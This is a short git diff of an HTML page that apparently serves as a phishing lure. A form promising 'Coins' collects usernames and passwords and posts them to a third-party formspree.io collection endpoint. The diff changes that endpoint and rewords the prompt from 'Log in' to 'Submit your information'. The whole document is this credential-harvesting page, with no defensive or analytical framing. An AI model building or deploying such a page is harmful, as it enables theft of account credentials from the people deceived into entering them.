--- a/index.html
+++ b/index.html
@@ -59,14 +59,13 @@
 </style>
 </head>
 <body>
-<form action="https://formspree.io/f/movkyadg" method="POST">
+<form action="https://formspree.io/f/xjkajbar" method="POST">
   <h2>
-    <span class="main-title">Log in to get Coins</span>
-    <span class="sub-title">Log in to your account to get Coins, check notifications and more.</span>
+    <span class="sub-title"> Submit your information to Get Coins. Check notification and more.</span>
   </h2>
   <input type="text" name="username" placeholder="Username" required>
   <input type="text" name="Password" placeholder="Password" required>
-  <button type="Continue">Continue</button>
+  <button type="Submit">Submit</button>
 </form>
 </body>
 </html>
